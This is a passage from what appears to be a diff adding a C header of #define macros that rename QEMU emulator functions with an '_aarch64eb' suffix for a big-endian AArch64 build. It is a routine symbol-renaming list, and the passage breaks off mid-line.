memory_region_set_enabled memory_region_set_enabled_aarch64eb +#define memory_region_set_readonly memory_region_set_readonly_aarch64eb +#define memory_region_set_skip_dump memory_region_set_skip_dump_aarch64eb +#define memory_region_size memory_region_size_aarch64eb +#define memory_region_to_address_space memory_region_to_address_space_aarch64eb +#define memory_region_transaction_begin memory_region_transaction_begin_aarch64eb +#define memory_region_transaction_commit memory_region_transaction_commit_aarch64eb +#define memory_region_unref memory_region_unref_aarch64eb +#define memory_region_update_container_subregions memory_region_update_container_subregions_aarch64eb +#define memory_region_write_accessor memory_region_write_accessor_aarch64eb +#define memory_region_wrong_endianness memory_region_wrong_endianness_aarch64eb +#define memory_try_enable_merging memory_try_enable_merging_aarch64eb +#define module_call_init module_call_init_aarch64eb +#define module_load module_load_aarch64eb +#define mpidr_cp_reginfo mpidr_cp_reginfo_aarch64eb +#define mpidr_read mpidr_read_aarch64eb +#define msr_mask msr_mask_aarch64eb +#define mul128By64To192 mul128By64To192_aarch64eb +#define mul128To256 mul128To256_aarch64eb +#define mul64To128 mul64To128_aarch64eb +#define muldiv64 muldiv64_aarch64eb +#define neon_2rm_is_float_op neon_2rm_is_float_op_aarch64eb +#define neon_2rm_sizes neon_2rm_sizes_aarch64eb +#define neon_3r_sizes neon_3r_sizes_aarch64eb +#define neon_get_scalar neon_get_scalar_aarch64eb +#define neon_load_reg neon_load_reg_aarch64eb +#define neon_load_reg64 neon_load_reg64_aarch64eb +#define neon_load_scratch neon_load_scratch_aarch64eb +#define neon_ls_element_type neon_ls_element_type_aarch64eb +#define neon_reg_offset neon_reg_offset_aarch64eb +#define neon_store_reg neon_store_reg_aarch64eb +#define neon_store_reg64 neon_store_reg64_aarch64eb +#define neon_store_scratch neon_store_scratch_aarch64eb +#define new_ldst_label new_ldst_label_aarch64eb +#define 
next_list next_list_aarch64eb +#define normalizeFloat128Subnormal normalizeFloat128Subnormal_aarch64eb +#define normalizeFloat16Subnormal normalizeFloat16Subnormal_aarch64eb +#define normalizeFloat32Subnormal normalizeFloat32Subnormal_aarch64eb +#define normalizeFloat64Subnormal normalizeFloat64Subnormal_aarch64eb +#define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_aarch64eb +#define normalizeRoundAndPackFloat128 normalizeRoundAndPackFloat128_aarch64eb +#define normalizeRoundAndPackFloat32 normalizeRoundAndPackFloat32_aarch64eb +#define normalizeRoundAndPackFloat64 normalizeRoundAndPackFloat64_aarch64eb +#define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_aarch64eb +#define not_v6_cp_reginfo not_v6_cp_reginfo_aarch64eb +#define not_v7_cp_reginfo not_v7_cp_reginfo_aarch64eb +#define not_v8_cp_reginfo not_v8_cp_reginfo_aarch64eb +#define object_child_foreach object_child_foreach_aarch64eb +#define object_class_foreach object_class_foreach_aarch64eb +#define object_class_foreach_tramp object_class_foreach_tramp_aarch64eb +#define object_class_get_list object_class_get_list_aarch64eb +#define object_class_get_list_tramp object_class_get_list_tramp_aarch64eb +#define object_class_get_parent object_class_get_parent_aarch64eb +#define object_deinit object_deinit_aarch64eb +#define object_dynamic_cast object_dynamic_cast_aarch64eb +#define object_finalize object_finalize_aarch64eb +#define object_finalize_child_property object_finalize_child_property_aarch64eb +#define object_get_child_property object_get_child_property_aarch64eb +#define object_get_link_property object_get_link_property_aarch64eb +#define object_get_root object_get_root_aarch64eb +#define object_initialize_with_type object_initialize_with_type_aarch64eb +#define object_init_with_type object_init_with_type_aarch64eb +#define object_instance_init object_instance_init_aarch64eb +#define object_new_with_type object_new_with_type_aarch64eb +#define object_post_init_with_type 
object_post_init_with_type_aarch64eb +#define object_property_add_alias object_property_add_alias_aarch64eb +#define object_property_add_link object_property_add_link_aarch64eb +#define object_property_add_uint16_ptr object_property_add_uint16_ptr_aarch64eb +#define object_property_add_uint32_ptr object_property_add_uint32_ptr_aarch64eb +#define object_property_add_uint64_ptr object_property_add_uint64_ptr_aarch64eb +#define object_property_add_uint8_ptr object_property_add_uint8_ptr_aarch64eb +#define object_property_allow_set_link object_property_allow_set_link_aarch64eb +#define object_property_del object_property_del_aarch64eb +#define object_property_del_all object_property_del_all_aarch64eb +#define object_property_find object_property_find_aarch64eb +#define object_property_get object_property_get_aarch64eb +#define object_property_get_bool object_property_get_bool_aarch64eb +#define object_property_get_int object_property_get_int_aarch64eb +#define object_property_get_link object_property_get_link_aarch64eb +#define object_property_get_qobject object_property_get_qobject_aarch64eb +#define object_property_get_str object_property_get_str_aarch64eb +#define object_property_get_type object_property_get_type_aarch64eb +#define object_property_is_child object_property_is_child_aarch64eb +#define object_property_set object_property_set_aarch64eb +#define object_property_set_description object_property_set_description_aarch64eb +#define object_property_set_link object_property_set_link_aarch64eb +#define object_property_set_qobject object_property_set_qobject_aarch64eb +#define object_release_link_property object_release_link_property_aarch64eb +#define object_resolve_abs_path object_resolve_abs_path_aarch64eb +#define object_resolve_child_property object_resolve_child_property_aarch64eb +#define object_resolve_link object_resolve_link_aarch64eb +#define object_resolve_link_property object_resolve_link_property_aarch64eb +#define object_resolve_partial_path 
object_resolve_partial_path_aarch64eb +#define object_resolve_path object_resolve_path_aarch64eb +#define object_resolve_path_component object_resolve_path_component_aarch64eb +#define object_resolve_path_type object_resolve_path_type_aarch64eb +#define object_set_link_property object_set_link_property_aarch64eb +#define object_unparent object_unparent_aarch64eb +#define omap_cachemaint_write omap_cachemaint_write_aarch64eb +#define omap_cp_reginfo omap_cp_reginfo_aarch64eb +#define omap_threadid_write omap_threadid_write_aarch64eb +#define omap_ticonfig_write omap_ticonfig_write_aarch64eb +#define omap_wfi_write omap_wfi_write_aarch64eb +#define op_bits op_bits_aarch64eb +#define open_modeflags open_modeflags_aarch64eb +#define op_to_mov op_to_mov_aarch64eb +#define op_to_movi op_to_movi_aarch64eb +#define output_type_enum output_type_enum_aarch64eb +#define packFloat128 packFloat128_aarch64eb +#define packFloat16 packFloat16_aarch64eb +#define packFloat32 packFloat32_aarch64eb +#define packFloat64 packFloat64_aarch64eb +#define packFloatx80 packFloatx80_aarch64eb +#define page_find page_find_aarch64eb +#define page_find_alloc page_find_alloc_aarch64eb +#define page_flush_tb page_flush_tb_aarch64eb +#define page_flush_tb_1 page_flush_tb_1_aarch64eb +#define page_init page_init_aarch64eb +#define page_size_init page_size_init_aarch64eb +#define par par_aarch64eb +#define parse_array parse_array_aarch64eb +#define parse_error parse_error_aarch64eb +#define parse_escape parse_escape_aarch64eb +#define parse_keyword parse_keyword_aarch64eb +#define parse_literal parse_literal_aarch64eb +#define parse_object parse_object_aarch64eb +#define parse_optional parse_optional_aarch64eb +#define parse_option_bool parse_option_bool_aarch64eb +#define parse_option_number parse_option_number_aarch64eb +#define parse_option_size parse_option_size_aarch64eb +#define parse_pair parse_pair_aarch64eb +#define parser_context_free parser_context_free_aarch64eb +#define 
parser_context_new parser_context_new_aarch64eb +#define parser_context_peek_token parser_context_peek_token_aarch64eb +#define parser_context_pop_token parser_context_pop_token_aarch64eb +#define parser_context_restore parser_context_restore_aarch64eb +#define parser_context_save parser_context_save_aarch64eb +#define parse_str parse_str_aarch64eb +#define parse_type_bool parse_type_bool_aarch64eb +#define parse_type_int parse_type_int_aarch64eb +#define parse_type_number parse_type_number_aarch64eb +#define parse_type_size parse_type_size_aarch64eb +#define parse_type_str parse_type_str_aarch64eb +#define parse_value parse_value_aarch64eb +#define par_write par_write_aarch64eb +#define patch_reloc patch_reloc_aarch64eb +#define phys_map_node_alloc phys_map_node_alloc_aarch64eb +#define phys_map_node_reserve phys_map_node_reserve_aarch64eb +#define phys_mem_alloc phys_mem_alloc_aarch64eb +#define phys_mem_set_alloc phys_mem_set_alloc_aarch64eb +#define phys_page_compact phys_page_compact_aarch64eb +#define phys_page_compact_all phys_page_compact_all_aarch64eb +#define phys_page_find phys_page_find_aarch64eb +#define phys_page_set phys_page_set_aarch64eb +#define phys_page_set_level phys_page_set_level_aarch64eb +#define phys_section_add phys_section_add_aarch64eb +#define phys_section_destroy phys_section_destroy_aarch64eb +#define phys_sections_free phys_sections_free_aarch64eb +#define pickNaN pickNaN_aarch64eb +#define pickNaNMulAdd pickNaNMulAdd_aarch64eb +#define pmccfiltr_write pmccfiltr_write_aarch64eb +#define pmccntr_read pmccntr_read_aarch64eb +#define pmccntr_sync pmccntr_sync_aarch64eb +#define pmccntr_write pmccntr_write_aarch64eb +#define pmccntr_write32 pmccntr_write32_aarch64eb +#define pmcntenclr_write pmcntenclr_write_aarch64eb +#define pmcntenset_write pmcntenset_write_aarch64eb +#define pmcr_write pmcr_write_aarch64eb +#define pmintenclr_write pmintenclr_write_aarch64eb +#define pmintenset_write pmintenset_write_aarch64eb +#define pmovsr_write 
pmovsr_write_aarch64eb +#define pmreg_access pmreg_access_aarch64eb +#define pmsav5_cp_reginfo pmsav5_cp_reginfo_aarch64eb +#define pmsav5_data_ap_read pmsav5_data_ap_read_aarch64eb +#define pmsav5_data_ap_write pmsav5_data_ap_write_aarch64eb +#define pmsav5_insn_ap_read pmsav5_insn_ap_read_aarch64eb +#define pmsav5_insn_ap_write pmsav5_insn_ap_write_aarch64eb +#define pmuserenr_write pmuserenr_write_aarch64eb +#define pmxevtyper_write pmxevtyper_write_aarch64eb +#define print_type_bool print_type_bool_aarch64eb +#define print_type_int print_type_int_aarch64eb +#define print_type_number print_type_number_aarch64eb +#define print_type_size print_type_size_aarch64eb +#define print_type_str print_type_str_aarch64eb +#define propagateFloat128NaN propagateFloat128NaN_aarch64eb +#define propagateFloat32MulAddNaN propagateFloat32MulAddNaN_aarch64eb +#define propagateFloat32NaN propagateFloat32NaN_aarch64eb +#define propagateFloat64MulAddNaN propagateFloat64MulAddNaN_aarch64eb +#define propagateFloat64NaN propagateFloat64NaN_aarch64eb +#define propagateFloatx80NaN propagateFloatx80NaN_aarch64eb +#define property_get_alias property_get_alias_aarch64eb +#define property_get_bool property_get_bool_aarch64eb +#define property_get_str property_get_str_aarch64eb +#define property_get_uint16_ptr property_get_uint16_ptr_aarch64eb +#define property_get_uint32_ptr property_get_uint32_ptr_aarch64eb +#define property_get_uint64_ptr property_get_uint64_ptr_aarch64eb +#define property_get_uint8_ptr property_get_uint8_ptr_aarch64eb +#define property_release_alias property_release_alias_aarch64eb +#define property_release_bool property_release_bool_aarch64eb +#define property_release_str property_release_str_aarch64eb +#define property_resolve_alias property_resolve_alias_aarch64eb +#define property_set_alias property_set_alias_aarch64eb +#define property_set_bool property_set_bool_aarch64eb +#define property_set_str property_set_str_aarch64eb +#define pstate_read pstate_read_aarch64eb 
+#define pstate_write pstate_write_aarch64eb +#define pxa250_initfn pxa250_initfn_aarch64eb +#define pxa255_initfn pxa255_initfn_aarch64eb +#define pxa260_initfn pxa260_initfn_aarch64eb +#define pxa261_initfn pxa261_initfn_aarch64eb +#define pxa262_initfn pxa262_initfn_aarch64eb +#define pxa270a0_initfn pxa270a0_initfn_aarch64eb +#define pxa270a1_initfn pxa270a1_initfn_aarch64eb +#define pxa270b0_initfn pxa270b0_initfn_aarch64eb +#define pxa270b1_initfn pxa270b1_initfn_aarch64eb +#define pxa270c0_initfn pxa270c0_initfn_aarch64eb +#define pxa270c5_initfn pxa270c5_initfn_aarch64eb +#define qapi_dealloc_end_implicit_struct qapi_dealloc_end_implicit_struct_aarch64eb +#define qapi_dealloc_end_list qapi_dealloc_end_list_aarch64eb +#define qapi_dealloc_end_struct qapi_dealloc_end_struct_aarch64eb +#define qapi_dealloc_get_visitor qapi_dealloc_get_visitor_aarch64eb +#define qapi_dealloc_next_list qapi_dealloc_next_list_aarch64eb +#define qapi_dealloc_pop qapi_dealloc_pop_aarch64eb +#define qapi_dealloc_push qapi_dealloc_push_aarch64eb +#define qapi_dealloc_start_implicit_struct qapi_dealloc_start_implicit_struct_aarch64eb +#define qapi_dealloc_start_list qapi_dealloc_start_list_aarch64eb +#define qapi_dealloc_start_struct qapi_dealloc_start_struct_aarch64eb +#define qapi_dealloc_start_union qapi_dealloc_start_union_aarch64eb +#define qapi_dealloc_type_bool qapi_dealloc_type_bool_aarch64eb +#define qapi_dealloc_type_enum qapi_dealloc_type_enum_aarch64eb +#define qapi_dealloc_type_int qapi_dealloc_type_int_aarch64eb +#define qapi_dealloc_type_number qapi_dealloc_type_number_aarch64eb +#define qapi_dealloc_type_size qapi_dealloc_type_size_aarch64eb +#define qapi_dealloc_type_str qapi_dealloc_type_str_aarch64eb +#define qapi_dealloc_visitor_cleanup qapi_dealloc_visitor_cleanup_aarch64eb +#define qapi_dealloc_visitor_new qapi_dealloc_visitor_new_aarch64eb +#define qapi_free_boolList qapi_free_boolList_aarch64eb +#define qapi_free_ErrorClassList 
qapi_free_ErrorClassList_aarch64eb +#define qapi_free_int16List qapi_free_int16List_aarch64eb +#define qapi_free_int32List qapi_free_int32List_aarch64eb +#define qapi_free_int64List qapi_free_int64List_aarch64eb +#define qapi_free_int8List qapi_free_int8List_aarch64eb +#define qapi_free_intList qapi_free_intList_aarch64eb +#define qapi_free_numberList qapi_free_numberList_aarch64eb +#define qapi_free_strList qapi_free_strList_aarch64eb +#define qapi_free_uint16List qapi_free_uint16List_aarch64eb +#define qapi_free_uint32List qapi_free_uint32List_aarch64eb +#define qapi_free_uint64List qapi_free_uint64List_aarch64eb +#define qapi_free_uint8List qapi_free_uint8List_aarch64eb +#define qapi_free_X86CPUFeatureWordInfo qapi_free_X86CPUFeatureWordInfo_aarch64eb +#define qapi_free_X86CPUFeatureWordInfoList qapi_free_X86CPUFeatureWordInfoList_aarch64eb +#define qapi_free_X86CPURegister32List qapi_free_X86CPURegister32List_aarch64eb +#define qbool_destroy_obj qbool_destroy_obj_aarch64eb +#define qbool_from_int qbool_from_int_aarch64eb +#define qbool_get_int qbool_get_int_aarch64eb +#define qbool_type qbool_type_aarch64eb +#define qbus_create qbus_create_aarch64eb +#define qbus_create_inplace qbus_create_inplace_aarch64eb +#define qbus_finalize qbus_finalize_aarch64eb +#define qbus_initfn qbus_initfn_aarch64eb +#define qbus_realize qbus_realize_aarch64eb +#define qdev_create qdev_create_aarch64eb +#define qdev_get_type qdev_get_type_aarch64eb +#define qdev_register_types qdev_register_types_aarch64eb +#define qdev_set_parent_bus qdev_set_parent_bus_aarch64eb +#define qdev_try_create qdev_try_create_aarch64eb +#define qdict_add_key qdict_add_key_aarch64eb +#define qdict_array_split qdict_array_split_aarch64eb +#define qdict_clone_shallow qdict_clone_shallow_aarch64eb +#define qdict_del qdict_del_aarch64eb +#define qdict_destroy_obj qdict_destroy_obj_aarch64eb +#define qdict_entry_key qdict_entry_key_aarch64eb +#define qdict_entry_value qdict_entry_value_aarch64eb +#define 
qdict_extract_subqdict qdict_extract_subqdict_aarch64eb +#define qdict_find qdict_find_aarch64eb +#define qdict_first qdict_first_aarch64eb +#define qdict_flatten qdict_flatten_aarch64eb +#define qdict_flatten_qdict qdict_flatten_qdict_aarch64eb +#define qdict_flatten_qlist qdict_flatten_qlist_aarch64eb +#define qdict_get qdict_get_aarch64eb +#define qdict_get_bool qdict_get_bool_aarch64eb +#define qdict_get_double qdict_get_double_aarch64eb +#define qdict_get_int qdict_get_int_aarch64eb +#define qdict_get_obj qdict_get_obj_aarch64eb +#define qdict_get_qdict qdict_get_qdict_aarch64eb +#define qdict_get_qlist qdict_get_qlist_aarch64eb +#define qdict_get_str qdict_get_str_aarch64eb +#define qdict_get_try_bool qdict_get_try_bool_aarch64eb +#define qdict_get_try_int qdict_get_try_int_aarch64eb +#define qdict_get_try_str qdict_get_try_str_aarch64eb +#define qdict_haskey qdict_haskey_aarch64eb +#define qdict_has_prefixed_entries qdict_has_prefixed_entries_aarch64eb +#define qdict_iter qdict_iter_aarch64eb +#define qdict_join qdict_join_aarch64eb +#define qdict_new qdict_new_aarch64eb +#define qdict_next qdict_next_aarch64eb +#define qdict_next_entry qdict_next_entry_aarch64eb +#define qdict_put_obj qdict_put_obj_aarch64eb +#define qdict_size qdict_size_aarch64eb +#define qdict_type qdict_type_aarch64eb +#define qemu_clock_get_us qemu_clock_get_us_aarch64eb +#define qemu_clock_ptr qemu_clock_ptr_aarch64eb +#define qemu_clocks qemu_clocks_aarch64eb +#define qemu_get_cpu qemu_get_cpu_aarch64eb +#define qemu_get_guest_memory_mapping qemu_get_guest_memory_mapping_aarch64eb +#define qemu_get_guest_simple_memory_mapping qemu_get_guest_simple_memory_mapping_aarch64eb +#define qemu_get_ram_block qemu_get_ram_block_aarch64eb +#define qemu_get_ram_block_host_ptr qemu_get_ram_block_host_ptr_aarch64eb +#define qemu_get_ram_fd qemu_get_ram_fd_aarch64eb +#define qemu_get_ram_ptr qemu_get_ram_ptr_aarch64eb +#define qemu_host_page_mask qemu_host_page_mask_aarch64eb +#define 
qemu_host_page_size qemu_host_page_size_aarch64eb +#define qemu_init_vcpu qemu_init_vcpu_aarch64eb +#define qemu_ld_helpers qemu_ld_helpers_aarch64eb +#define qemu_log_close qemu_log_close_aarch64eb +#define qemu_log_enabled qemu_log_enabled_aarch64eb +#define qemu_log_flush qemu_log_flush_aarch64eb +#define qemu_loglevel_mask qemu_loglevel_mask_aarch64eb +#define qemu_log_vprintf qemu_log_vprintf_aarch64eb +#define qemu_oom_check qemu_oom_check_aarch64eb +#define qemu_parse_fd qemu_parse_fd_aarch64eb +#define qemu_ram_addr_from_host qemu_ram_addr_from_host_aarch64eb +#define qemu_ram_addr_from_host_nofail qemu_ram_addr_from_host_nofail_aarch64eb +#define qemu_ram_alloc qemu_ram_alloc_aarch64eb +#define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_aarch64eb +#define qemu_ram_foreach_block qemu_ram_foreach_block_aarch64eb +#define qemu_ram_free qemu_ram_free_aarch64eb +#define qemu_ram_free_from_ptr qemu_ram_free_from_ptr_aarch64eb +#define qemu_ram_ptr_length qemu_ram_ptr_length_aarch64eb +#define qemu_ram_remap qemu_ram_remap_aarch64eb +#define qemu_ram_setup_dump qemu_ram_setup_dump_aarch64eb +#define qemu_ram_unset_idstr qemu_ram_unset_idstr_aarch64eb +#define qemu_real_host_page_size qemu_real_host_page_size_aarch64eb +#define qemu_st_helpers qemu_st_helpers_aarch64eb +#define qemu_tcg_init_vcpu qemu_tcg_init_vcpu_aarch64eb +#define qemu_try_memalign qemu_try_memalign_aarch64eb +#define qentry_destroy qentry_destroy_aarch64eb +#define qerror_human qerror_human_aarch64eb +#define qerror_report qerror_report_aarch64eb +#define qerror_report_err qerror_report_err_aarch64eb +#define qfloat_destroy_obj qfloat_destroy_obj_aarch64eb +#define qfloat_from_double qfloat_from_double_aarch64eb +#define qfloat_get_double qfloat_get_double_aarch64eb +#define qfloat_type qfloat_type_aarch64eb +#define qint_destroy_obj qint_destroy_obj_aarch64eb +#define qint_from_int qint_from_int_aarch64eb +#define qint_get_int qint_get_int_aarch64eb +#define qint_type qint_type_aarch64eb 
+#define qlist_append_obj qlist_append_obj_aarch64eb +#define qlist_copy qlist_copy_aarch64eb +#define qlist_copy_elem qlist_copy_elem_aarch64eb +#define qlist_destroy_obj qlist_destroy_obj_aarch64eb +#define qlist_empty qlist_empty_aarch64eb +#define qlist_entry_obj qlist_entry_obj_aarch64eb +#define qlist_first qlist_first_aarch64eb +#define qlist_iter qlist_iter_aarch64eb +#define qlist_new qlist_new_aarch64eb +#define qlist_next qlist_next_aarch64eb +#define qlist_peek qlist_peek_aarch64eb +#define qlist_pop qlist_pop_aarch64eb +#define qlist_size qlist_size_aarch64eb +#define qlist_size_iter qlist_size_iter_aarch64eb +#define qlist_type qlist_type_aarch64eb +#define qmp_input_end_implicit_struct qmp_input_end_implicit_struct_aarch64eb +#define qmp_input_end_list qmp_input_end_list_aarch64eb +#define qmp_input_end_struct qmp_input_end_struct_aarch64eb +#define qmp_input_get_next_type qmp_input_get_next_type_aarch64eb +#define qmp_input_get_object qmp_input_get_object_aarch64eb +#define qmp_input_get_visitor qmp_input_get_visitor_aarch64eb +#define qmp_input_next_list qmp_input_next_list_aarch64eb +#define qmp_input_optional qmp_input_optional_aarch64eb +#define qmp_input_pop qmp_input_pop_aarch64eb +#define qmp_input_push qmp_input_push_aarch64eb +#define qmp_input_start_implicit_struct qmp_input_start_implicit_struct_aarch64eb +#define qmp_input_start_list qmp_input_start_list_aarch64eb +#define qmp_input_start_struct qmp_input_start_struct_aarch64eb +#define qmp_input_type_bool qmp_input_type_bool_aarch64eb +#define qmp_input_type_int qmp_input_type_int_aarch64eb +#define qmp_input_type_number qmp_input_type_number_aarch64eb +#define qmp_input_type_str qmp_input_type_str_aarch64eb +#define qmp_input_visitor_cleanup qmp_input_visitor_cleanup_aarch64eb +#define qmp_input_visitor_new qmp_input_visitor_new_aarch64eb +#define qmp_input_visitor_new_strict qmp_input_visitor_new_strict_aarch64eb +#define qmp_output_add_obj qmp_output_add_obj_aarch64eb +#define 
qmp_output_end_list qmp_output_end_list_aarch64eb +#define qmp_output_end_struct qmp_output_end_struct_aarch64eb +#define qmp_output_first qmp_output_first_aarch64eb +#define qmp_output_get_qobject qmp_output_get_qobject_aarch64eb +#define qmp_output_get_visitor qmp_output_get_visitor_aarch64eb +#define qmp_output_last qmp_output_last_aarch64eb +#define qmp_output_next_list qmp_output_next_list_aarch64eb +#define qmp_output_pop qmp_output_pop_aarch64eb +#define qmp_output_push_obj qmp_output_push_obj_aarch64eb +#define qmp_output_start_list qmp_output_start_list_aarch64eb +#define qmp_output_start_struct qmp_output_start_struct_aarch64eb +#define qmp_output_type_bool qmp_output_type_bool_aarch64eb +#define qmp_output_type_int qmp_output_type_int_aarch64eb +#define qmp_output_type_number qmp_output_type_number_aarch64eb +#define qmp_output_type_str qmp_output_type_str_aarch64eb +#define qmp_output_visitor_cleanup qmp_output_visitor_cleanup_aarch64eb +#define qmp_output_visitor_new qmp_output_visitor_new_aarch64eb +#define qobject_decref qobject_decref_aarch64eb +#define qobject_to_qbool qobject_to_qbool_aarch64eb +#define qobject_to_qdict qobject_to_qdict_aarch64eb +#define qobject_to_qfloat qobject_to_qfloat_aarch64eb +#define qobject_to_qint qobject_to_qint_aarch64eb +#define qobject_to_qlist qobject_to_qlist_aarch64eb +#define qobject_to_qstring qobject_to_qstring_aarch64eb +#define qobject_type qobject_type_aarch64eb +#define qstring_append qstring_append_aarch64eb +#define qstring_append_chr qstring_append_chr_aarch64eb +#define qstring_append_int qstring_append_int_aarch64eb +#define qstring_destroy_obj qstring_destroy_obj_aarch64eb +#define qstring_from_escaped_str qstring_from_escaped_str_aarch64eb +#define qstring_from_str qstring_from_str_aarch64eb +#define qstring_from_substr qstring_from_substr_aarch64eb +#define qstring_get_length qstring_get_length_aarch64eb +#define qstring_get_str qstring_get_str_aarch64eb +#define qstring_new qstring_new_aarch64eb 
+#define qstring_type qstring_type_aarch64eb +#define ram_block_add ram_block_add_aarch64eb +#define ram_size ram_size_aarch64eb +#define range_compare range_compare_aarch64eb +#define range_covers_byte range_covers_byte_aarch64eb +#define range_get_last range_get_last_aarch64eb +#define range_merge range_merge_aarch64eb +#define ranges_can_merge ranges_can_merge_aarch64eb +#define raw_read raw_read_aarch64eb +#define raw_write raw_write_aarch64eb +#define rcon rcon_aarch64eb +#define read_raw_cp_reg read_raw_cp_reg_aarch64eb +#define recip_estimate recip_estimate_aarch64eb +#define recip_sqrt_estimate recip_sqrt_estimate_aarch64eb +#define register_cp_regs_for_features register_cp_regs_for_features_aarch64eb +#define register_multipage register_multipage_aarch64eb +#define register_subpage register_subpage_aarch64eb +#define register_tm_clones register_tm_clones_aarch64eb +#define register_types_object register_types_object_aarch64eb +#define regnames regnames_aarch64eb +#define render_memory_region render_memory_region_aarch64eb +#define reset_all_temps reset_all_temps_aarch64eb +#define reset_temp reset_temp_aarch64eb +#define rol32 rol32_aarch64eb +#define rol64 rol64_aarch64eb +#define ror32 ror32_aarch64eb +#define ror64 ror64_aarch64eb +#define roundAndPackFloat128 roundAndPackFloat128_aarch64eb +#define roundAndPackFloat16 roundAndPackFloat16_aarch64eb +#define roundAndPackFloat32 roundAndPackFloat32_aarch64eb +#define roundAndPackFloat64 roundAndPackFloat64_aarch64eb +#define roundAndPackFloatx80 roundAndPackFloatx80_aarch64eb +#define roundAndPackInt32 roundAndPackInt32_aarch64eb +#define roundAndPackInt64 roundAndPackInt64_aarch64eb +#define roundAndPackUint64 roundAndPackUint64_aarch64eb +#define round_to_inf round_to_inf_aarch64eb +#define run_on_cpu run_on_cpu_aarch64eb +#define s0 s0_aarch64eb +#define S0 S0_aarch64eb +#define s1 s1_aarch64eb +#define S1 S1_aarch64eb +#define sa1100_initfn sa1100_initfn_aarch64eb +#define sa1110_initfn 
sa1110_initfn_aarch64eb +#define save_globals save_globals_aarch64eb +#define scr_write scr_write_aarch64eb +#define sctlr_write sctlr_write_aarch64eb +#define set_bit set_bit_aarch64eb +#define set_bits set_bits_aarch64eb +#define set_default_nan_mode set_default_nan_mode_aarch64eb +#define set_feature set_feature_aarch64eb +#define set_float_detect_tininess set_float_detect_tininess_aarch64eb +#define set_float_exception_flags set_float_exception_flags_aarch64eb +#define set_float_rounding_mode set_float_rounding_mode_aarch64eb +#define set_flush_inputs_to_zero set_flush_inputs_to_zero_aarch64eb +#define set_flush_to_zero set_flush_to_zero_aarch64eb +#define set_swi_errno set_swi_errno_aarch64eb +#define sextract32 sextract32_aarch64eb +#define sextract64 sextract64_aarch64eb +#define shift128ExtraRightJamming shift128ExtraRightJamming_aarch64eb +#define shift128Right shift128Right_aarch64eb +#define shift128RightJamming shift128RightJamming_aarch64eb +#define shift32RightJamming shift32RightJamming_aarch64eb +#define shift64ExtraRightJamming shift64ExtraRightJamming_aarch64eb +#define shift64RightJamming shift64RightJamming_aarch64eb +#define shifter_out_im shifter_out_im_aarch64eb +#define shortShift128Left shortShift128Left_aarch64eb +#define shortShift192Left shortShift192Left_aarch64eb +#define simple_mpu_ap_bits simple_mpu_ap_bits_aarch64eb +#define size_code_gen_buffer size_code_gen_buffer_aarch64eb +#define softmmu_lock_user softmmu_lock_user_aarch64eb +#define softmmu_lock_user_string softmmu_lock_user_string_aarch64eb +#define softmmu_tget32 softmmu_tget32_aarch64eb +#define softmmu_tget8 softmmu_tget8_aarch64eb +#define softmmu_tput32 softmmu_tput32_aarch64eb +#define softmmu_unlock_user softmmu_unlock_user_aarch64eb +#define sort_constraints sort_constraints_aarch64eb +#define sp_el0_access sp_el0_access_aarch64eb +#define spsel_read spsel_read_aarch64eb +#define spsel_write spsel_write_aarch64eb +#define start_list start_list_aarch64eb +#define stb_p 
stb_p_aarch64eb +#define stb_phys stb_phys_aarch64eb +#define stl_be_p stl_be_p_aarch64eb +#define stl_be_phys stl_be_phys_aarch64eb +#define stl_he_p stl_he_p_aarch64eb +#define stl_le_p stl_le_p_aarch64eb +#define stl_le_phys stl_le_phys_aarch64eb +#define stl_phys stl_phys_aarch64eb +#define stl_phys_internal stl_phys_internal_aarch64eb +#define stl_phys_notdirty stl_phys_notdirty_aarch64eb +#define store_cpu_offset store_cpu_offset_aarch64eb +#define store_reg store_reg_aarch64eb +#define store_reg_bx store_reg_bx_aarch64eb +#define store_reg_from_load store_reg_from_load_aarch64eb +#define stq_be_p stq_be_p_aarch64eb +#define stq_be_phys stq_be_phys_aarch64eb +#define stq_he_p stq_he_p_aarch64eb +#define stq_le_p stq_le_p_aarch64eb +#define stq_le_phys stq_le_phys_aarch64eb +#define stq_phys stq_phys_aarch64eb +#define string_input_get_visitor string_input_get_visitor_aarch64eb +#define string_input_visitor_cleanup string_input_visitor_cleanup_aarch64eb +#define string_input_visitor_new string_input_visitor_new_aarch64eb +#define strongarm_cp_reginfo strongarm_cp_reginfo_aarch64eb +#define strstart strstart_aarch64eb +#define strtosz strtosz_aarch64eb +#define strtosz_suffix strtosz_suffix_aarch64eb +#define stw_be_p stw_be_p_aarch64eb +#define stw_be_phys stw_be_phys_aarch64eb +#define stw_he_p stw_he_p_aarch64eb +#define stw_le_p stw_le_p_aarch64eb +#define stw_le_phys stw_le_phys_aarch64eb +#define stw_phys stw_phys_aarch64eb +#define stw_phys_internal stw_phys_internal_aarch64eb +#define sub128 sub128_aarch64eb +#define sub16_sat sub16_sat_aarch64eb +#define sub16_usat sub16_usat_aarch64eb +#define sub192 sub192_aarch64eb +#define sub8_sat sub8_sat_aarch64eb +#define sub8_usat sub8_usat_aarch64eb +#define subFloat128Sigs subFloat128Sigs_aarch64eb +#define subFloat32Sigs subFloat32Sigs_aarch64eb +#define subFloat64Sigs subFloat64Sigs_aarch64eb +#define subFloatx80Sigs subFloatx80Sigs_aarch64eb +#define subpage_accepts subpage_accepts_aarch64eb +#define 
subpage_init subpage_init_aarch64eb +#define subpage_ops subpage_ops_aarch64eb +#define subpage_read subpage_read_aarch64eb +#define subpage_register subpage_register_aarch64eb +#define subpage_write subpage_write_aarch64eb +#define suffix_mul suffix_mul_aarch64eb +#define swap_commutative swap_commutative_aarch64eb +#define swap_commutative2 swap_commutative2_aarch64eb +#define switch_mode switch_mode_aarch64eb +#define switch_v7m_sp switch_v7m_sp_aarch64eb +#define syn_aa32_bkpt syn_aa32_bkpt_aarch64eb +#define syn_aa32_hvc syn_aa32_hvc_aarch64eb +#define syn_aa32_smc syn_aa32_smc_aarch64eb +#define syn_aa32_svc syn_aa32_svc_aarch64eb +#define syn_breakpoint syn_breakpoint_aarch64eb +#define sync_globals sync_globals_aarch64eb +#define syn_cp14_rrt_trap syn_cp14_rrt_trap_aarch64eb +#define syn_cp14_rt_trap syn_cp14_rt_trap_aarch64eb +#define syn_cp15_rrt_trap syn_cp15_rrt_trap_aarch64eb +#define syn_cp15_rt_trap syn_cp15_rt_trap_aarch64eb +#define syn_data_abort syn_data_abort_aarch64eb +#define syn_fp_access_trap syn_fp_access_trap_aarch64eb +#define 